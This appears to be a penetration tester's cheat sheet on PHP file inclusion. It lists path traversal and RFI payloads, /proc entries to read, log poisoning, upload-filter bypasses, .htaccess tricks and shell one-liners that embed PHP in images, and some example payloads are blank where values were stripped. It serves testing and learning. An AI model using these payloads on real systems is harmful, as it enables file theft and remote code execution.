File Inclusions

In my research, i have found that file inclusion vulnerabilities (whether it be LFI of RFI) can be the most fruitful avenues to exploiting a box. There are many ways to test for and exploit file inclusion vulnerabilities. Here is a list that I have put together for my own reference:

  • Basic LFI / Path Traversal: ?page=/etc/passwd ?page=../../../../../../etc/passwd

  • Basic RFI: ?file= ?file= ?file=

    • Sometimes, input validation may prevent “http/https” requests but this is usually overcome easily by changing the case: ?file=HTTP:// ?file=htTp:// ?file=HttP://

LFI - Local File Inclusion

In most cases, when LFI is possible, the proc file system will be accessible for reading Some interesting proc entires to keep in mind are: /proc/shed_debug : provides information concerning which processes are running are which cpu. Can help identify running PIDs /proc/mounts : provides a list of mounted file systems /proc/net/arp : displays ARP table info /proc/net/route : displays routing table info /proc/net/tcp[udp] : provides a lsit of active TCP(UDP) connections, identifies listening ports /proc/net/fib_trie : this is used for route caching and help gain a better understanding of a target’s network structure /proc/version : displays kernel version info

If an application’s PID is known, here are some interesting entries: (NOTE: $PID can also be “self” to represent the running process) /proc/$PID/cmdline : lists everything that was used to invoke the process /proc/$PID/environ : list all environment variables that were set when the process was executed /proc/$PID/cwd : points to the current working directory of the process /proc/$PID/fd/[#] : provides access to the file descriptor specified

In some cases, it is possible to execute PHP via the php://include wrapper: <?phpinfo();?> Or it may also be possible to look at the source of PHP files on the server using the php://filter wrapper: `

Including injected PHP code: (/var/log/apache/error.log) ?file=../../../../../../../var/log/apache/error.log


  1. PHP bypass content-type filtering and extension checks:
    • try uploading a file.php, intercepting the request and changing the MIME type (i.e. image/gif image/png image/jpg image/jpeg)
    • try changing the extension to .PHP instead of .php (lowercase vs uppercase)
    • try appending additional extensions: .jpg.php or .php.jpg or
    • try tiggering the NULL byte: .php%00 or .php%00.jpg (also try: .php%00?)
    • try uploading an image with embedded php: (depends solely on the ability to write to the file: .htaccess)
      • Add the following to the .htaccess file:

        AddType application/x-httpd-php .jpg


        AddType application/x-httpd-php5 .jpg

      • Append php code to a valid image file:

        echo '<?php mail("root@localhost", "test" "mic check 1..2..1..2");' >> image.jpg

      • In some cases, it may be necessary for the PHP code to prefix the image:

        ( echo -n '<?php header("Content-Type: image/jpg"); mail("root@localhost", "test", "mic check..1..2..1..2");?>'; cat original_image.png ) >> image.php.jpg

      • Upload the file and visit the image’s URL. The image will display and the php code will also execute.
      • Try also embedding the php code somewhere else in the image (i.e. the EXIF data)

         # delete extra headers
         jhead -purejpg file.jpg
         # edit EXIF data:
         jhead -ce file.jpg
         # paste your php code in one line:
         - It's quickest to use curl to execute the script:  `curl -i -X POST "" -d "1=id"`

Resources & More Info on how to protect against these vulnerabilities: